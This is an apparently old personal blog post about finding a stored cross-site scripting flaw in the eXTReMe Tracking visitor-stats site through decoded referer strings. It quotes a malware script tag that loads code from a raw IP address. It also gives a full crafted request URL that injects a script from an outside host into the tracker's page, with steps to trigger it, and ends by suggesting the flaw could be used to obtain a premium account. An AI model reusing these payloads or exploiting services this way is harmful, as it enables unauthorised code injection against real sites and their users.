I use this one to track visitors coming to my blog.<br>Recently there has been an evil Chinese virus roaming around freely, and I have been blogging about it. And many people have been coming to my blog via the Google query:<br><pre><script src=http://121.15.220.104/1.js></script></pre><br>which is the signature for the virus.<br><br>Guess what? Today when I visited eXTReMe Tracking, I saw this nice ad:<br><a href="%5C"><img alt="\"link\"" src="%5C">http://www.flickr.com/photos/22823442@N02/2195246062/</a><br>What happened? No, neither my comp nor any other computer arround was pwned by the virus. It was the tracker site that got pwned. For some weird reason it htmldecoded the referer string, and as a result the malicious script was inserted to the page.<br><br>Now let's see if I can \"forge\" the referer to insert my own script to the page <img alt="\":)\"" src="%5C">
I finally managed to reproduce the XSS in a \"nice\" way <img alt="\":)\"" src="%5C"><br>First you need to request the page:<br><a href="%5C"><img alt="\"link\"" src="%5C">http://e1.extreme-dm.com/s10.g?login=qpenguin&jv=y&j=y&srw=1024&srb=24&l=http%3A//www.google.com/search%3Fhl%3Den%26q%3D%3Cscript+src%3Dhttp%3A//quangntenemy.t35.com/lolxss.js%3E%3C/script%3E%26btnG%3DGoogle+Search</a><br>Then wait for a few minutes and you'll see the xss here: <a href="%5C"><img alt="\"link\"" src="%5C">http://extremetracking.com/open;ref1?login=qpenguin</a><br>Screenshot:<br><a href="%5C"><img alt="\"link\"" src="%5C">http://www.flickr.com/photos/22823442@N02/2194552167/</a><br><br>Now maybe I can use this to get a premium account. This type 2 XSS attack is surely the most dangerous one <img alt="\":)\"" src="%5C">